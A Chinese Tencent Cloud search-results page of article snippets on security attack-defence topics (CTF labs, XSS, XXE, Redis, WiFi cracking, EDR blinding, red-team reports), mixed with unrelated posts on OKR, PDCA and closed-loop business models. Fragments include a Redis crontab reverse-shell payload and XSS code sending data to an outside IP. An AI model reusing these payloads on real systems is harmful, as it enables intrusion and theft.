- 综合排序
- 最热优先
- 最新优先
- 来自专栏OneMoreThink的专栏
攻防靶场(23):DC-2
扫描端口和服务,发现80/http和7744/ssh 1.3 主动扫描:字典扫描 扫描目录,发现网站是wordpress 访问http://10.58.81.141/,会301跳转到http://dc-2/ ,但域名无法解析 在/etc/hosts中添加域名解析后,成功打开http://dc-2/ 1.4 搜索目标网站 浏览网站,发现靶机作者提示使用cewl进行信息收集 使用cewl收集到一批字典 3. 初始访问 3.1 有效账户:默认账户 将cewl收集的字典作为密码,结合wpscan扫描到的帐号进行爆破,获得2个WordPress的有效账户 3.2 有效账户:默认账户 密码喷洒攻击,将有效账户在SSH
26510编辑于 2024-10-28 - 来自专栏网络安全攻防
内核攻防-(2)致盲EDR
2、模式匹配由外部定义的验证函数(如 ValidateLeaPattern、ValidateCallJmpPattern 等)提供逻辑。 2、调用 ValidateLeaRipPattern 检查: 地址 0x1000 的内容 0x48 0x8D 0x05 匹配。 函数 2:ClearMiniFilterCallBack 功能概述 枚举系统中所有 MiniFilter 驱动,并对其进行回调清理。 2、调用 IsEDRHash 检查驱动程序是否属于已知的 EDR 驱动。 3、如果是 EDR 驱动,清除对应的回调地址,并打印清理信息。 2、引入不可预测性: 使用 __rdtsc()(获取 CPU 时间戳计数器)和随机化的哈希值生成不可预测的执行路径。
1.3K00编辑于 2025-02-19 - 来自专栏新智元
DeepMind发布SIMA 2!打通「感知-推理-行动-反思」闭环
这使得SIMA 2可以在它从未见过的游戏中完成任务,具体见下面视频对SIMA 1和SIMA 2的对比。 图2:SIMA 2 可以处理各种新颖且复杂的指令,包括分解指令以成功导航至特定房间。SIMA 2 还可以接受用户手绘的草图,以指定位置、路径或物体。 图4:在所有训练游戏环境中中,SIMA 1、SIMA 2 和人类的任务完成成功率对比,SIMA 2相比SIMA 1平均成功率翻倍,在人类和自动评估时下均接近人类水平。 图5:SIMA 2在多个技能类别中显著优于 SIMA 1。在交互和物体管理等类别中,SIMA 2的表现几乎接近人类水平。然而,在资源收集和战斗等其他类别中,SIMA 2 仍有提升空间。 不过,研究者也承认,SIMA 2中的智能体在处理超长时间跨度、复杂的任务时,仍然面临需要大量多步骤推理和目标验证等挑战。 此外,SIMA 2 对交互历史的记忆相对较短。
21210编辑于 2026-01-13 - 来自专栏数据的力量
O2O的闭环是如何形成的?
O2O的闭环是最初大家在该领域争论最多的问题之一,争论甚至讨论到闭环究竟存在与不存在。并且最初闭环概念被团购业当做盈利的手段,有一次某大型团购网站的一个区域经理就跟我说,不闭环就收不到钱。 闭环的概念被滥用,以至于许多行业人士认为闭环并不存在是一个谬误。 假如你用PC端的思维方式去思考闭环这个概念,你一定无法认识闭环在O2O领域的真实含义是什么。 一、O2O的闭环存在清晰的线索 首先你必须认识到,闭环在O2O领域存在着非常清晰的线索,最初许多人将闭环概念变得非常混乱,其原因就在于线索混乱。 闭环必须从食物链结构中分析出来,闭环就是O2O的盈利模式。 二、O2O的闭环——一种生态链 必须认识到,闭环设计绝非笼统的谈论团购或者优惠券那么简单,因此闭环节点的选择需要设计者对所切入行业商业规则的深刻理解。
93720发布于 2018-06-20 - 来自专栏wuming_CTF
攻防世界web进阶区web2详解
php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $miwen=base64_decode(strrev
1.1K10发布于 2021-01-21 - 来自专栏用户6296428的专栏
需求价值闭环实践
作者:啊福 部门:效能改进 一、背景 为了确保把有限的资源放在最有价值的事情上,有赞在建立了需求价值假设-研发上线-价值回顾的结构化价值闭环管理机制的基础上,以需求为切入点打通了上下游(详见需求价值闭环管理机制 同时,在效能平台实现了支撑价值闭环的相关功能,确保价值闭环过程和结果的公开透明,也更利于团队及时采取措施和校准目标。通过以上方式,在需求价值闭环的有感知、有依据、有反馈方面得到一些改进。 二、目标 在以需求维度开展价值闭环活动的基础上,实现从公司战略及业务线 OKR 到具体落地需求的自洽,到通过 Feature Team 的运作方式进行价值闭环过程联动,并辅以信息化度量分析手段,对研发资源规划 、排期等活动产生影响,则是实现需求价值闭环深入管理、有效运转的重心。 微观:提升价值闭环活动质量 需求价值闭环活动有了「形」之后,要使其有「神」的话,就要考虑提升价值闭环质量。
1.2K20发布于 2020-08-24 - 来自专栏大数据架构师成长之路
OKR-闭环模式
2.O一般不超过5个,不是越多越好,另外一定要有时间限定,短期的叫做目标,而长期就叫做战略了。 80%,用户数增加2亿Key Result 2:单量环比提升120%Key Result 3:提升揽收服务体验,一线人员满意度SPI提升30%,单均揽收时常缩短2/3Key Result 4:提升用户下单体验 计划和总结是一个闭环,围绕Objective的Key Result逐一攻破。最后在retrospective上,复盘就聚焦在价值是否达成,是否和KR的主线是紧密关联的,针对这个进行圆桌讨论。 我认为这才是最重要的部分,要形成这样的闭环: 制定okr--->目标导向--->团队学习、成长、知识库形成、重新认知、执行力提升、视野开阔--->目标达成--->盘点Review---->制定OKR。 spm=a2h0k.11417342.soresults.dtitle l 把OKR当做例行公事,没法量化KR时就轻易放弃了。
1.3K40发布于 2020-04-16 - 来自专栏我的安全视界观
多维视角下的实战攻防演习纪实 2
本章为该系列的第二篇,从不同视角对实战攻防演习的期望进行了描述。大到国家和公司,小至个人,都对演习满怀期待。
33030编辑于 2023-09-02 - 来自专栏红日安全
Web安全Day2 - XSS跨站实战攻防
大家好,我们是红日安全-Web安全攻防小组。 脚本语言:PHP7 安装http server与php环境(ubuntu: sudo apt-get install apache2 php5 或 sudo apt-get install apache2 new Date(); t2=d2.getTime(); location.href="http://123.207.99.17/id1? XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); _base64Str = _base64Str.substring(0 , _len-2); }else{//一个等号说明补了2个0 extra_Zero_Count
1.8K40发布于 2020-02-18 - 来自专栏prepared
持续闭环工具PDCA
五、结论 PDCA 是一种持续闭环工具,通过循环的方式帮助组织和个人实现目标,并不断优化和改进工作流程。
1.6K10编辑于 2023-12-07 - 来自专栏prepared
持续闭环工具PDCA
五、结论 PDCA 是一种持续闭环工具,通过循环的方式帮助组织和个人实现目标,并不断优化和改进工作流程。
1.1K10编辑于 2023-12-07 - 来自专栏后端沉思录
打车业务闭环思考
站在目前我所在的业务模块,用图示简略的概括供需撮合、业务驱动、全局架构图,而形成业务闭环,更加细节的系统交互就不作多述。 总结 业务的开始与结束,在业务开展中最终会形成业务闭环(用车端发起--》用车端结束)。
34710编辑于 2021-12-09 - 来自专栏RASP社区
攻防演练 | 攻防在即,RASP为上
信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。 而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。 ,可谓是神经紧绷、夜晚失眠、饭菜不香,真希望攻防演练的活动抓紧结束,避免自身丢分,被吊打的很惨。 图片众所周知,在攻防中为了牢固防线安全运营团队会部署安全防护工具、制定安全解决方案对防线进行实施保护。 而且,RASP技术集合BAS技术可以在攻防演练活动中实现自动化检测,对安全威胁进行验证,确保安全链路完整。正因此,RASP技术可以更好的在攻防演练中发挥作用,确保防线安全,避免防守方丢分。
98730编辑于 2023-04-19 - 来自专栏全栈程序员必看
XXE攻防
BurpSuite的在线实验室为例:Lab: Exploiting XXE using external entities to retrieve files 1:点开网站,随便选择一个页面 2: internal.vulnerable-website.com/"> ]> 以BurpSuite的在线实验室为例:Lab: Exploiting XXE to perform SSRF attacks 1:随意打开一个页面 2: 192.168.40.152/flagmeout.php,所以需要设定一下读取文件位置 作者读对flag做了二次处理,上面的flag是一个经过base32编码的 1:base32解码 2: 参考 [红日安全]Web安全Day8 – XXE实战攻防 浅谈XXE攻击 XXE漏洞利用技巧:从XML到远程代码执行 未知攻焉知防——XXE漏洞攻防 XXE从入门到放弃 浅谈XXE漏洞攻击与防御
1.5K20编辑于 2022-08-31 - 来自专栏极安御信安全研究院
XCTF攻防世界--(新手赛区)第2题快来围观学习!
通过最后几行代码我们得知我们需要的flag就是代码中的hash变量 //此时我们逆向推到hash变量的来源 //1.hash值由fist、second和argv[3]三个变量来决定,那我们就跟踪这三个变量 //2. \n"); exit(2); } unsigned int second = atoi(argv[2]); if (second
30420编辑于 2022-05-20 - 来自专栏Khan安全团队
Redis攻防
201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev %2Ftcp%2F192.168.17.141%2F7777%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D
1.3K20发布于 2021-01-11 BP综述:闭环脑刺激
图2是脑信号读出的这两种功能的说明。图2 脑信号读取处理如果可以认为刺激对大脑的作用是瞬时的,随时间不变的,没有后遗症,并且在很大程度上独立于持续的大脑动力学,那么这种情况是相对直接的。 基于这些考虑,我们提出了以下4个基本指标来表征闭环疗法:1)刺激系统的自由度(开/关、强度、电流波形、位置、方向等);2)从脑电信号中提取的参数数量及其时间分辨率,以及衍生的脑状态估计(振荡相位、谱振幅 2. 这种方法将需要一种二阶更新算法,该算法可以连续比较真实输出(例如MEP振幅)和参考,并调整刺激参数,以减少真实输出和参考之间的差异(参见图2)。 左侧DLPFC的实时α振荡同步TMS治疗抑郁症的临床可行性已在2项独立的先导性研究中得到证实,这些研究在脑电图同步的情况下显示出有前景的神经生理效应。
58010编辑于 2024-06-03- 来自专栏FreeBuf
无线攻防:wifi攻防从破解到钓鱼
RTL-SDR、USRP、HackRF、及BladeRF等外设的价格下降,软件环境社区的完善,使现在对无线网络的研究已经不再像以前只能利用2.4GHz的无线网卡进行狭义的“无线”攻防。 2)WEP漏洞及破解 (1)802.2头消息和简单RC4流密码算法。导致攻击者在有客户端并有大量有效通信时,可以分析出WEP的密码 (2)重复使用。导致攻击者在有客户端少量通信或者没有通信时。 2、WPE加密方式 WPA加密方式 WPA全程为WiFi protected access,既Wif网络安全存取,有WPA和WPA2两个标准,是基于有线等效加密中几个严重的弱点而产生的。 WPA加密方式目前有四种认证方式:WPA、WPA-PSK、WPA2、WPA2-PSK。 WAP加密流程如下: ⑴ 无线AP定期发送beacon数据包,使无线终端更新自己的无线网络列表。 ENC是加密方式,可以看到都是WPA2的。有的也会有WPA和WEP,但是这两个安全性都不如WPA2。CH是工作频道。 我们要破解图中的FAST 236D,这个是我的wifi。
9.5K42发布于 2021-08-24 - 来自专栏红蓝对抗
攻防|记一次攻防案例总结
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦在某头部直辖市的攻防演练中,各家安全厂商投入了大量人力物力...而我方基本未做准备,只有小米加步枪, 且看如何不用0day如何连下数城前言几个月前打了一场某头部直辖市的攻防演练,演练当时通知的很急促,没做什么准备直接小米加步枪上阵了...在此过程中,很多个没用到0day的打点案例都很有意思,下面就简单分享一下案例一 RCE的话,历史上主要有“默认X-API-Key”和“Dashboard未授权访问”两个洞可以用过往挖某SRC的时候,就遇到过默认X-API-Key导致可直接创建执行lua代码的恶意路由的问题恰巧这次攻防演练中 难怪用不了使用该JWT,通过webpack提取到的api,访问后端API,拿下大量敏感信息,达千万量级,防止burp卡死,仅列出部分后言不断提升识别攻击面、利用攻击面的广度与深度,是一名hacker的核心素养攻防之中 ,拥有充足的经验,而又不陷入经验主义的迂腐,面对万难,而又不放弃思考,是出奇制胜的关键所在原文经过过文作者授权转载原文作者:奇安信攻防社区(J0o1ey)原文地址:https://forum.butian.net
1.2K20编辑于 2023-12-25 - 来自专栏红蓝对抗
攻防|记一次市级攻防演练
时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩ 端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了 结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练
1K61编辑于 2023-02-28
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号